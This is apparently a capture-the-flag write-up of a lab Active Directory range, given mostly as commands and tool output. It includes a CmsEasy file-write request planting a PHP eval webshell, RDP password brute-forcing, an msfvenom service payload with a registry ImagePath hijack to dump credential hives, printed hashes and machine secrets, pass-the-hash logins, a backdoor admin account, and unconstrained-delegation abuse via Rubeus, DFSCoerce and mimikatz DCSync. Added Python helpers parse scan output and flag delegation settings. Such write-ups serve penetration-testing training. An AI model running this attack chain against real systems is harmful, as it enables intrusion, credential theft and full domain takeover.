春秋云境-Delegation

https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E5%92%8C%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9Egetshell

Exploiting the vulnerability (CmsEasy 7.7.5 arbitrary file write, see the link above)

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.98.107.54
Content-Length: 76
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded;
Cookie: PHPSESSID=qrqmi2nksq9l5qatj65c1i69c3; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Connection: close

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php @eval($_POST[1]);?>

Connect to the webshell with AntSword (蚁剑).

SUID enumeration

find / -user root -perm -4000 -print 2>/dev/null

Here the escalation is through diff, which is SUID root: it will happily print any file it can open.

diff --line-format=%L /dev/null /home/flag/flag01.txt

Lateral movement

Serve fscan from port 80 on the VPS, pull it onto the target, and scan the internal segment:

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.45 is alive
(icmp) Target 172.22.4.19 is alive
[*] Icmp alive hosts len is: 4
172.22.4.36:21 open
172.22.4.45:80 open
172.22.4.19:135 open
172.22.4.7:88 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.19:139 open
172.22.4.45:139 open
172.22.4.7:139 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.4.45 XIAORANG\WIN19
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.4.36 code:200 len:68100 title:中文网页标题
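As an added example (not part of the original write-up), the fscan output above is folded into one record per host so that the DC and the web/SMB hosts can be picked out programmatically instead of by eye. The sample text is the scan output pasted from above; the DC heuristic (Kerberos 88 plus SMB 445, or fscan's own `[+] DC:` tag) is my addition.

```python
import re
from collections import defaultdict

# Constructed sample: the lines that matter from the fscan run above, pasted verbatim
# (the banner and the "len is" summary lines are omitted; the parser ignores them anyway).
SAMPLE = """\
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.45 is alive
(icmp) Target 172.22.4.19 is alive
172.22.4.36:21 open
172.22.4.45:80 open
172.22.4.19:135 open
172.22.4.7:88 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.19:139 open
172.22.4.45:139 open
172.22.4.7:139 open
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.4.45 XIAORANG\\WIN19
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
ALIVE = re.compile(rf"^\(icmp\) Target ({IPV4}) is alive")
PORT = re.compile(rf"^({IPV4}):(\d+) open")
NETINFO_IP = re.compile(rf"^\[\*\]({IPV4})$")
NETINFO_NAME = re.compile(r"^\[->\](.+)$")
NETBIOS = re.compile(rf"^\[\*\] NetBios ({IPV4}) (.*)$")
OSINFO = re.compile(rf"^\[\*\] OsInfo ({IPV4}) \((.*)\)$")
WEBTITLE = re.compile(r"^\[\*\] WebTitle (\S+) code:(\d+) len:(\d+) title:(.*)$")


def _new_host():
    return {"ports": set(), "names": set(), "os": None, "dc": False, "web": []}


def parse_fscan(text):
    """Fold fscan's line-oriented output into one record per IP."""
    hosts = defaultdict(_new_host)
    current = None  # IP of the NetInfo block currently being read
    for line in text.splitlines():
        line = line.rstrip()
        if m := ALIVE.match(line):
            hosts[m.group(1)]  # register the host even if no port turns out to be open
        elif m := PORT.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := NETINFO_IP.match(line):
            current = m.group(1)
            hosts[current]
        elif m := NETINFO_NAME.match(line):
            # NetInfo repeats the IP as a "name"; keep only real hostnames
            if current and not re.fullmatch(IPV4, m.group(1)):
                hosts[current]["names"].add(m.group(1))
        elif m := NETBIOS.match(line):
            ip, rest = m.groups()
            host = hosts[ip]
            if "[+] DC:" in rest:  # fscan marks domain controllers inline
                host["dc"] = True
                rest = rest.split("[+] DC:", 1)[1]
            name, *os_words = rest.split()
            host["names"].add(name)
            if os_words:
                host["os"] = " ".join(os_words)
        elif m := OSINFO.match(line):
            hosts[m.group(1)]["os"] = m.group(2)
        elif m := WEBTITLE.match(line):
            url, code, _length, title = m.groups()
            ip = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]
            hosts[ip]["web"].append((url, int(code), title))
    return dict(hosts)


def domain_controllers(hosts):
    """IPs fscan tagged as DC, or that expose both Kerberos (88) and SMB (445)."""
    return sorted(ip for ip, h in hosts.items() if h["dc"] or {88, 445} <= h["ports"])


def summary(hosts):
    """One line per host, sorted numerically, the way you'd paste it into notes."""
    lines = []
    for ip in sorted(hosts, key=lambda s: tuple(int(o) for o in s.split("."))):
        h = hosts[ip]
        tag = " [DC]" if ip in domain_controllers(hosts) else ""
        lines.append(f"{ip}{tag} names={sorted(h['names'])} ports={sorted(h['ports'])} os={h['os']}")
    return lines


if __name__ == "__main__":
    print("\n".join(summary(parse_fscan(SAMPLE))))
```

Run it on a saved fscan result (`parse_fscan(open("result.txt").read())`) to get the same table; the `dc` flag comes straight from fscan's NetBios line, the port heuristic catches DCs on segments where NetBios probing failed.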

flag01 hints at WIN19, so start with 172.22.4.45; it also mentions rockyou, so it is not hard to guess that a password brute-force is expected.

Full port scan of WIN19 first:

./fscan -h 172.22.4.45 -p 1-65535

Set up a proxy into the segment and brute-force RDP on 3389 (and SMB, as a cross-check):

proxychains4 hydra -l 'win19\Adrian' -P /usr/share/wordlists/rockyou.txt 172.22.4.45 rdp

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

(The login is quoted: unquoted `win19\Adrian` loses the backslash in bash.)

win19\Adrian babygirl1

RDP from a normal client did not get in.

Following a blog post, connect from Kali with rdesktop instead:

proxychains rdesktop 172.22.4.45

Change the password there, then connect with Parallels Client.

Registry privilege escalation

There is a scan result on the desktop that points at a registry-based privilege escalation: the gupdate service's registry key is writable, so its ImagePath can be repointed.

Generate a service executable with msfvenom that simply runs sam.bat:

msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\sam.bat' --platform windows -f exe-service > a.exe

Then write sam.bat, which saves the three registry hives, and upload both files to the Windows machine.

reg save hklm\system C:\Users\Adrian\Desktop\system
reg save hklm\sam C:\Users\Adrian\Desktop\sam
reg save hklm\security C:\Users\Adrian\Desktop\security

On the Windows machine, in PowerShell, point the service's ImagePath at a.exe:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\a.exe" /f

Then start the service from cmd; it runs a.exe under the service account, which is privileged enough to save the hives:

sc start gupdate

Three files (system, sam, security) appear on the desktop.

Copy them to Kali and extract the hashes with secretsdump:

┌──(root㉿kali)-[~/Desktop/baji]
└─# impacket-secretsdump LOCAL -sam sam -security security -system system
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x08092415ee8b9b2ad2f5f5060fb48339
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:94291812c16338307ad6e39f69438dc1:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Aldrich:$DCC2$10240#Aldrich#e4170181a8bb2a24e6113a9b4895307a: (2022-06-24 03:18:39)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:b4ed1b0e56b94c3200d14254d8b93c209751282f4f1fdc22f08b2445f88e7c9416640ec7be39a3a96542b57908b5425271ca84d4514e3452b9df96f9b53141b14f90632af381b68dcd2f5053cae57a2e50c9e04a4eb2e6dd3b707bb593b80096912294cc5d07eb6f5e6d918024f58aa48a169f48079d6a5eedb27d8de7a96da3647ab984d24d87f34c6ec275c33122e6971ae0028cf0402afcf9c6e5b566c5bd182eb970d4476b97d49c09bfb97d297e6cec7a40c74aae874ad9f51477ca6a50c746dfd75046340b067eb5bc44d691ed47995b10d319ee7a8261e99f3375775f8b36615e337f2020e22c7c72da7ad831
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:163bc37b84732d4ceeb4840fdaaf2271
[*] DPAPI_SYSTEM
dpapi_machinekey:0x4af114bade59102b7c64e41cde94be2257337fab
dpapi_userkey:0x372392e560b616ecd27b6ec0fe138ef86790b565
[*] NL$KM
0000 56 4B 21 B3 87 A3 29 41 FD 91 8F 3A 2D 2B 86 CC VK!...)A...:-+..
0010 49 4A EE 48 6C CD 9C D7 C7 DA 65 B6 62 4D 35 BD IJ.Hl.....e.bM5.
0020 09 F7 59 68 23 69 DE BA 2D 47 84 47 29 AD 5D AE ..Yh#i..-G.G).].
0030 A0 5F 19 CA 21 13 E4 6D 01 27 C3 FC 0C C1 0F 2E ._..!..m.'......
NL$KM:564b21b387a32941fd918f3a2d2b86cc494aee486ccd9cd7c7da65b6624d35bd09f759682369deba2d47844729ad5daea05f19ca2113e46d0127c3fc0cc10f2e
[*] Cleaning up...

That gives the local Administrator's NT hash; pass the hash with psexec.py:

proxychains python3 psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

type C:\Users\Administrator\flag\flag02.txt

flag{92727123-810e-4309-a004-9e547651f41d}

Add a backdoor user (needed for an interactive RDP session later):

net user calmsec qwer1234! /add
net localgroup administrators calmsec /add

Unconstrained delegation

Run BloodHound collection with the machine account; the hash is the $MACHINE.ACC NT hash from the secretsdump output:

proxychains bloodhound-python -u 'win19$' --hashes "aad3b435b51404eeaad3b435b51404ee:163bc37b84732d4ceeb4840fdaaf2271" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

BloodHound shows that WIN19 is configured for unconstrained delegation (DC01 has it too, but every domain controller does).
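Added example (not the page's code) showing what BloodHound is actually reporting here: the TRUSTED_FOR_DELEGATION bit in userAccountControl. The UAC values for DC01$, WIN19$ and FILESERVER$ in the sample are constructed to match those roles, not read from the range; the ldap3-based function at the end is an assumption about how you would run the same check live and is not executed here.

```python
# userAccountControl flag values (MS-SAMR / MS-ADTS; well-known constants).
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000                       # set on domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000                    # unconstrained delegation
UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self)

# LDAP bitwise-AND matching rule, used to test a single UAC bit inside a filter
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def unconstrained_filter():
    """Computers with TRUSTED_FOR_DELEGATION set, excluding DCs (which always have it)."""
    return (
        "(&(objectCategory=computer)"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_TRUSTED_FOR_DELEGATION})"
        f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_SERVER_TRUST_ACCOUNT})))"
    )


def classify(uac, allowed_to_delegate_to=()):
    """Delegation configuration of one account from its UAC bits and msDS-AllowedToDelegateTo."""
    if uac & UF_TRUSTED_FOR_DELEGATION:
        # a DC is expected to carry the bit; anything else is the WIN19 situation:
        # every TGT forwarded to it (e.g. DC01$'s after a coercion) can be replayed
        return "unconstrained-dc" if uac & UF_SERVER_TRUST_ACCOUNT else "unconstrained"
    if allowed_to_delegate_to:
        if uac & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
            return "constrained-protocol-transition"
        return "constrained"
    return "none"


# Constructed sample, modelled on the hosts fscan found above. The UAC values are the ones
# such roles normally carry; they were not read from the range.
SAMPLE_COMPUTERS = [
    ("DC01$", UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION, ()),
    ("WIN19$", UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION, ()),
    ("FILESERVER$", UF_WORKSTATION_TRUST_ACCOUNT, ()),
]


def findings(computers):
    """Accounts whose delegation setting is abusable: everything except 'none' and the DC case."""
    return [
        (name, kind)
        for name, uac, allowed in computers
        if (kind := classify(uac, allowed)) not in ("none", "unconstrained-dc")
    ]


def ldap_findings(dc_host, domain, user, password, base_dn):
    """Same check against a live DC with ldap3 (assumed installed; not run in this example)."""
    from ldap3 import ALL, NTLM, Connection, Server
    conn = Connection(Server(dc_host, get_info=ALL), user=f"{domain}\\{user}",
                      password=password, authentication=NTLM, auto_bind=True)
    conn.search(base_dn, "(objectCategory=computer)",
                attributes=["sAMAccountName", "userAccountControl", "msDS-AllowedToDelegateTo"])
    rows = [(str(e.sAMAccountName), int(e.userAccountControl.value),
             tuple(e["msDS-AllowedToDelegateTo"].values)) for e in conn.entries]
    return findings(rows)


if __name__ == "__main__":
    print(unconstrained_filter())
    print(findings(SAMPLE_COMPUTERS))
```

The filter string is the same one BloodHound's collector and most AD audit scripts use; on the defensive side, the fix for WIN19 is to clear the bit (or move to constrained delegation) and to put sensitive accounts in Protected Users so their TGTs are never forwarded.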

Log in to WIN19 with the newly created admin account and run Rubeus with administrator privileges, watching for tickets for DC01$:

Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

Then trigger DFSCoerce against the DC so that DC01$ authenticates to WIN19; because WIN19 has unconstrained delegation, the DC's forwarded TGT lands in WIN19's LSASS and Rubeus prints it.

Take the DC01$ ticket Rubeus printed, base64-decode it and save it as DC01.kirbi:

echo '<base64 ticket from Rubeus>' | base64 -d > DC01.kirbi

Upload mimikatz, purge the current tickets, inject the DC01$ ticket and DCSync the domain Administrator's hash:

mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

With the domain Administrator's NT hash from DCSync, move laterally to 172.22.4.19:

proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19

type C:\Users\Administrator\flag\flag03.txt

Following the hint, the last box is the DC itself:

proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7

type C:\Users\Administrator\flag\flag04.txt